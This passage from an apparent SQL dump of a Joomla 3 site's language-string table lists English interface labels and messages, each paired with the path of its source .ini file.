administrator.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(777,'COM_USERS_USER_FIELD_BACKEND_LANGUAGE_DESC','Choose your default language for the Backend.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(778,'COM_USERS_USER_FIELD_BACKEND_LANGUAGE_LABEL','Backend Language','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(779,'COM_USERS_USER_FIELD_BACKEND_TEMPLATE_DESC','Select the template style for the Administrator Backend interface. This will only affect this User.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(780,'COM_USERS_USER_FIELD_BACKEND_TEMPLATE_LABEL','Backend Template Style','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(781,'COM_USERS_USER_FIELD_EDITOR_DESC','Choose your text editor.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(782,'COM_USERS_USER_FIELD_EDITOR_LABEL','Editor','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(783,'COM_USERS_USER_FIELD_FRONTEND_LANGUAGE_DESC','Choose your default language for the Frontend.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(784,'COM_USERS_USER_FIELD_FRONTEND_LANGUAGE_LABEL','Frontend Language','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(785,'COM_USERS_USER_FIELD_HELPSITE_DESC','Help site for the Backend.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(786,'COM_USERS_USER_FIELD_HELPSITE_LABEL','Help Site','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(787,'COM_USERS_USER_FIELD_TIMEZONE_DESC','Choose your time zone.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(788,'COM_USERS_USER_FIELD_TIMEZONE_LABEL','Time Zone','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(789,'COM_USERS_USER_NOT_FOUND','User not found.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(790,'COM_USERS_USER_SAVE_FAILED','Failed to save user: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(791,'COM_WEBLINKS_CAPTCHA_LABEL','Captcha','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(792,'COM_WEBLINKS_CAPTCHA_DESC','Please complete the security check.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(793,'COM_WEBLINKS_CONTENT_TYPE_WEBLINK','Web Link','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(794,'COM_WEBLINKS_CONTENT_TYPE_CATEGORY','Web Links Category','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(795,'COM_WEBLINKS_DEFAULT_PAGE_TITLE','Web Links','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(796,'COM_WEBLINKS_EDIT','Edit Web link','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(797,'COM_WEBLINKS_ERR_TABLES_NAME','There is already a Web Link with that name in this category. Please try again.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(798,'COM_WEBLINKS_ERR_TABLES_PROVIDE_URL','Please provide a valid URL','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(799,'COM_WEBLINKS_ERR_TABLES_TITLE','Your Web Link must have a title.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(800,'COM_WEBLINKS_ERROR_CATEGORY_NOT_FOUND','Web Link category not found.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(801,'COM_WEBLINKS_ERROR_UNIQUE_ALIAS','Another Web Link from this category has the same alias (remember it may be a trashed item).','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(802,'COM_WEBLINKS_ERROR_WEBLINK_NOT_FOUND','Web Link not found.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(803,'COM_WEBLINKS_ERROR_WEBLINK_URL_INVALID','Invalid Web link URL.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(804,'COM_WEBLINKS_FIELD_ALIAS_DESC','The alias is for internal use only. Leave this blank and Joomla will fill in a default value from the title. It has to be unique for each web link in the same category.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(805,'COM_WEBLINKS_FIELD_CATEGORY_DESC','You must select a Category.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(806,'COM_WEBLINKS_FIELD_DESCRIPTION_DESC','Enter a description for your Web link.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(807,'COM_WEBLINKS_FILTER_LABEL','Filter Field','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(808,'COM_WEBLINKS_FILTER_SEARCH_DESC','Web Links filter search','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(809,'COM_WEBLINKS_FIELD_TITLE_DESC','Your Web Link must have a Title.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(810,'COM_WEBLINKS_FIELD_URL_DESC','You must enter a URL.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(811,'COM_WEBLINKS_FIELD_URL_LABEL','URL','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(812,'COM_WEBLINKS_FORM_CREATE_WEBLINK','Submit a Web Link','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(813,'COM_WEBLINKS_GRID_TITLE','Title','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(814,'COM_WEBLINKS_LINK','Web Link','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(815,'COM_WEBLINKS_NAME','Name','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(816,'COM_WEBLINKS_NO_WEBLINKS','There are no Web Links in this category.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(817,'COM_WEBLINKS_NUM','# of links:','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(818,'COM_WEBLINKS_NUM_ITEMS','Links in categories','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(819,'COM_WEBLINKS_FORM_EDIT_WEBLINK','Edit a Web Link','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(820,'COM_WEBLINKS_FORM_SUBMIT_WEBLINK','Submit a Web Link','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(821,'COM_WEBLINKS_SAVE_SUCCESS','Web link saved.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(822,'COM_WEBLINKS_SUBMIT_SAVE_SUCCESS','Web Link submitted.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(823,'COM_WEBLINKS_WEB_LINKS','Web Links','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(824,'JGLOBAL_NEWITEMSLAST_DESC','New Web Links default to the last position. Ordering can be changed after this Web Link has been saved.','/home/smthsmth/public_html/language/en-GB/en-GB.com_weblinks.ini'),(825,'COM_WRAPPER_NO_IFRAMES','This option will not work correctly. Unfortunately, your browser does not support inline frames.','/home/smthsmth/public_html/language/en-GB/en-GB.com_wrapper.ini'),(826,'FILES_JOOMLA','Joomla CMS','/home/smthsmth/public_html/language/en-GB/en-GB.files_joomla.sys.ini'),(827,'FILES_JOOMLA_ERROR_FILE_FOLDER','Error on deleting file or folder %s','/home/smthsmth/public_html/language/en-GB/en-GB.files_joomla.sys.ini'),(828,'FILES_JOOMLA_ERROR_MANIFEST','Error on updating manifest cache: (type, element, folder, client) = (%s, %s, %s, %s)','/home/smthsmth/public_html/language/en-GB/en-GB.files_joomla.sys.ini'),(829,'FILES_JOOMLA_XML_DESCRIPTION','Joomla! 3 Content Management System.','/home/smthsmth/public_html/language/en-GB/en-GB.files_joomla.sys.ini'),(830,'FINDER_CLI','Smart Search INDEXER','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(831,'FINDER_CLI_BATCH_COMPLETE',' * Processed batch %s in %s seconds.','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(832,'FINDER_CLI_BATCH_CONTINUING',' * Continuing processing of batch ...','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(833,'FINDER_CLI_BATCH_PAUSING',' * Pausing processing for %s seconds ...','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(834,'FINDER_CLI_FILTER_RESTORE_WARNING','Warning: Did not find taxonomy %s/%s in filter %s','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(835,'FINDER_CLI_INDEX_PURGE','Clear index','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(836,'FINDER_CLI_INDEX_PURGE_FAILED','- index clear failed.','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(837,'FINDER_CLI_INDEX_PURGE_SUCCESS','- index clear successful','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(838,'FINDER_CLI_PEAK_MEMORY_USAGE','Peak memory usage: %s bytes','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(839,'FINDER_CLI_PROCESS_COMPLETE','Total Processing Time: %s seconds.','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(840,'FINDER_CLI_RESTORE_FILTER_COMPLETED','- number of filters restored: %s','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(841,'FINDER_CLI_RESTORE_FILTERS','Restoring filters','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(842,'FINDER_CLI_SAVE_FILTER_COMPLETED','- number of saved filters: %s','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(843,'FINDER_CLI_SAVE_FILTERS','Saving filters','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(844,'FINDER_CLI_SETTING_UP_PLUGINS','Setting up Smart Search plugins','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(845,'FINDER_CLI_SETUP_ITEMS','Setup %s items in %s seconds.','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(846,'FINDER_CLI_SKIPPING_PAUSE_LOW_BATCH_PROCESSING_TIME',' * Skipping pause, as previous batch had a very low processing time (%ss < %ss)','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(847,'FINDER_CLI_STARTING_INDEXER','Starting Indexer','/home/smthsmth/public_html/language/en-GB/en-GB.finder_cli.ini'),(848,'JERROR_PARSING_LANGUAGE_FILE',' : error(s) in line(s) %s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(849,'ERROR','Error','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(850,'INFO','Info','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(851,'MESSAGE','Message','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(852,'NOTICE','Notice','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(853,'WARNING','Warning','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(854,'J1','1','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(855,'J2','2','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(856,'J3','3','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(857,'J4','4','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(858,'J5','5','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(859,'J6','6','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(860,'J7','7','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(861,'J8','8','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(862,'J9','9','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(863,'J10','10','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(864,'J15','15','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(865,'J20','20','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(866,'J25','25','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(867,'J30','30','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(868,'J50','50','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(869,'J100','100','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(870,'J200','200','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(871,'J500','500','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(872,'JACTION_ADMIN','Configure','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(873,'JACTION_ADMIN_GLOBAL','Super User','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(874,'JACTION_COMPONENT_SETTINGS','Component Settings','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(875,'JACTION_CREATE','Create','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(876,'JACTION_DELETE','Delete','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(877,'JACTION_EDIT','Edit','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(878,'JACTION_EDITOWN','Edit Own','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(879,'JACTION_EDITSTATE','Edit State','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(880,'JACTION_LOGIN_ADMIN','Administrator Login','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(881,'JACTION_LOGIN_SITE','Site Login','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(882,'JACTION_MANAGE','Access Administration Interface','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(883,'JADMINISTRATOR','Administrator','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(884,'JALL','All','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(885,'JALL_LANGUAGE','All','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(886,'JAPPLY','Save','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(887,'JARCHIVED','Archived','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(888,'JASSOCIATIONS','Also available:','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(889,'JASSOCIATIONS_ASC','Associations ascending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(890,'JASSOCIATIONS_DESC','Associations descending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(891,'JAUTHOR','Author','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(892,'JAUTHOR_ASC','Author ascending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(893,'JAUTHOR_DESC','Author descending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(894,'JCANCEL','Cancel','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(895,'JCATEGORY','Category','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(896,'JCATEGORY_ASC','Category ascending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(897,'JCATEGORY_DESC','Category descending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(898,'JCLEAR','Clear','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(899,'JDATE','Date','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(900,'JDATE_ASC','Date ascending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(901,'JDATE_DESC','Date descending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(902,'JDAY','Day','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(903,'JDEFAULT','Default','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(904,'JDETAILS','Details','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(905,'JDISABLED','Disabled','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(906,'JEDITOR','Editor','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(907,'JENABLED','Enabled','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(908,'JEXPIRED','Expired','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(909,'JFALSE','False','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(910,'JFEATURED','Featured','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(911,'JFEATURED_ASC','Featured ascending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(912,'JFEATURED_DESC','Featured descending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(913,'JHIDE','Hide','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(914,'JINVALID_TOKEN','The most recent request was denied because it had an invalid security token. Please refresh the page and try again.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(915,'JINVALID_TOKEN_NOTICE','The security token did not match. The request was aborted to prevent any security breach. Please try again.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(916,'JLOGIN','Log in','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(917,'JLOGOUT','Log out','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(918,'JMONTH','Month','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(919,'JNEW','New','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(920,'JNEXT','Next','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(921,'JNEXT_TITLE','Next article: %s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(922,'JNO','No','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(923,'JNONE','None','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(924,'JNOTPUBLISHEDYET','Not published yet','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(925,'JNOTICE','Notice','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(926,'JOFF','Off','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(927,'JOFFLINE_MESSAGE','This site is down for maintenance.<br />Please check back again soon.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(928,'JON','On','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(929,'JOPTIONS','Options','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(930,'JPAGETITLE','%1$s - %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(931,'JPREV','Prev','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(932,'JPREVIOUS','Previous','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(933,'JPREVIOUS_TITLE','Previous article: %s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(934,'JPUBLISHED','Published','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(935,'JREGISTER','Register','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(936,'JREQUIRED','Required','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(937,'JSAVE','Save','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(938,'JSELECT','Select','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(939,'JSHOW','Show','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(940,'JSITE','Site','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(941,'JSTATUS','Status','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(942,'JSTATUS_ASC','Status ascending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(943,'JSTATUS_DESC','Status descending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(944,'JSUBMIT','Submit','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(945,'JTAG','Tags','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(946,'JTAG_DESC','Assign tags to content items. You may select a tag from the pre-defined list or enter a new tag by typing the name in the field and pressing enter.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(947,'JTAG_FIELD_SELECT_DESC','Select the tag to use.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(948,'JTOOLBAR','Toolbar','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(949,'JTOOLBAR_VERSIONS','Versions','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(950,'JTRASH','Trash','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(951,'JTRASHED','Trashed','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(952,'JTRUE','True','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(953,'JUNPUBLISHED','Unpublished','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(954,'JUSER_TOOLS','User tools','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(955,'JYEAR','Year','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(956,'JYES','Yes','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(957,'JBROWSERTARGET_MODAL','Modal','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(958,'JBROWSERTARGET_NEW','Open in new window','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(959,'JBROWSERTARGET_PARENT','Open in parent window','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(960,'JBROWSERTARGET_POPUP','Open in popup','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(961,'JERROR_ALERTNOAUTHOR','You are not authorised to view this resource.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(962,'JERROR_ALERTNOTEMPLATE','<strong>The template for this display is not available. Please contact a Site administrator.</strong>','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(963,'JERROR_AN_ERROR_HAS_OCCURRED','An error has occurred.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(964,'JERROR_COULD_NOT_FIND_TEMPLATE','Could not find template \"%s\".','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(965,'JERROR_ERROR','Error','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(966,'JERROR_LAYOUT_AN_OUT_OF_DATE_BOOKMARK_FAVOURITE','an <strong>out-of-date bookmark/favourite</strong>','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(967,'JERROR_LAYOUT_ERROR_HAS_OCCURRED_WHILE_PROCESSING_YOUR_REQUEST','An error has occurred while processing your request.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(968,'JERROR_LAYOUT_GO_TO_THE_HOME_PAGE','Go to the Home Page','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(969,'JERROR_LAYOUT_HOME_PAGE','Home Page','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(970,'JERROR_LAYOUT_MIS_TYPED_ADDRESS','a <strong>mistyped address</strong>','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(971,'JERROR_LAYOUT_NOT_ABLE_TO_VISIT','You may not be able to visit this page because of:','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(972,'JERROR_LAYOUT_PAGE_NOT_FOUND','The requested page can\'t be found.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(973,'JERROR_LAYOUT_PLEASE_CONTACT_THE_SYSTEM_ADMINISTRATOR','If difficulties persist, please contact the System Administrator of this site and report the error below.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(974,'JERROR_LAYOUT_PLEASE_TRY_ONE_OF_THE_FOLLOWING_PAGES','Please try one of the following pages:','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(975,'JERROR_LAYOUT_PREVIOUS_ERROR','Previous Error','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(976,'JERROR_LAYOUT_REQUESTED_RESOURCE_WAS_NOT_FOUND','The requested resource was not found.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(977,'JERROR_LAYOUT_SEARCH','You may wish to search the site or visit the home page.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(978,'JERROR_LAYOUT_SEARCH_ENGINE_OUT_OF_DATE_LISTING','a search engine that has an <strong>out-of-date listing for this site</strong>','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(979,'JERROR_LAYOUT_SEARCH_PAGE','Search this site','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(980,'JERROR_LAYOUT_YOU_HAVE_NO_ACCESS_TO_THIS_PAGE','you have <strong>no access</strong> to this page','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(981,'JERROR_LOADING_MENUS','Error loading Menus: %s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(982,'JERROR_LOGIN_DENIED','You can\'t access the private section of this site.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(983,'JERROR_NOLOGIN_BLOCKED','Login denied! Your account has either been blocked or you have not activated it yet.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(984,'JERROR_PAGE_NOT_FOUND','Page not found','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(985,'JERROR_SENDING_EMAIL','Email could not be sent.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(986,'JERROR_SESSION_STARTUP','Error starting the session.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(987,'JERROR_TABLE_BIND_FAILED','hmm %s ...','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(988,'JERROR_USERS_PROFILE_NOT_FOUND','User profile not found','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(989,'JFIELD_ACCESS_DESC','Access level for this content.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(990,'JFIELD_ACCESS_LABEL','Access','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(991,'JFIELD_ALIAS_DESC','The Alias will be used in the SEF URL. Leave this blank and Joomla! will fill in a default value from the title. This value will depend on the SEO settings (Global Configuration->Site). <br />Using Unicode will produce UTF-8 aliases. You may also enter manually any UTF-8 character. Spaces and some forbidden characters will be changed to hyphens.<br />When using default transliteration it will produce an alias in lower case and with dashes instead of spaces. You may enter the Alias manually. Use lowercase letters and hyphens (-). No spaces or underscores are allowed. Default value will be a date and time if the title is typed in non-latin letters .','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(992,'JFIELD_ALIAS_LABEL','Alias','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(993,'JFIELD_ALIAS_PLACEHOLDER','Auto-generate from title','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(994,'JFIELD_ALT_PAGE_TITLE_LABEL','Alternative Page Title','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(995,'JFIELD_CATEGORY_DESC','Category','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(996,'JFIELD_FIELDS_CATEGORY_DESC','Select the category that this field is assigned to.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(997,'JFIELD_LANGUAGE_DESC','Assign a language to this article.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(998,'JFIELD_LANGUAGE_LABEL','Language','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(999,'JFIELD_META_DESCRIPTION_DESC','Metadata description.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1000,'JFIELD_META_DESCRIPTION_LABEL','Meta Description','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1001,'JFIELD_META_KEYWORDS_DESC','Keywords describing the content.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1002,'JFIELD_META_KEYWORDS_LABEL','Keywords','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1003,'JFIELD_META_RIGHTS_DESC','Describe what rights others have to use this content.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1004,'JFIELD_META_RIGHTS_LABEL','Content Rights','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1005,'JFIELD_ORDERING_DESC','Ordering of the article within the category.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1006,'JFIELD_ORDERING_LABEL','Ordering','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1007,'JFIELD_PUBLISHED_DESC','Set publication status.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1008,'JFIELD_TITLE_DESC','Title for the article.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1009,'JGLOBAL_ADD_CUSTOM_CATEGORY','Add new Category','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1010,'JGLOBAL_ARTICLES','Articles','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1011,'JGLOBAL_FIELDS','Fields','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1012,'JGLOBAL_AUTH_ACCESS_DENIED','Access Denied','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1013,'JGLOBAL_AUTH_ACCESS_GRANTED','Access Granted','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1014,'JGLOBAL_AUTH_BIND_FAILED','Failed binding to LDAP server','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1015,'JGLOBAL_AUTH_CANCEL','Authentication cancelled','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1016,'JGLOBAL_AUTH_CURL_NOT_INSTALLED','Curl isn\'t installed.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1017,'JGLOBAL_AUTH_EMPTY_PASS_NOT_ALLOWED','Empty password not allowed.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1018,'JGLOBAL_AUTH_FAIL','Authentication failed','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1019,'JGLOBAL_AUTH_FAILED','Failed to authenticate: %s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1020,'JGLOBAL_AUTH_INCORRECT','Incorrect username/password','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1021,'JGLOBAL_AUTH_INVALID_PASS','Username and password do not match or you do not have an account yet.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1022,'JGLOBAL_AUTH_INVALID_SECRETKEY','The two factor authentication Secret Key is 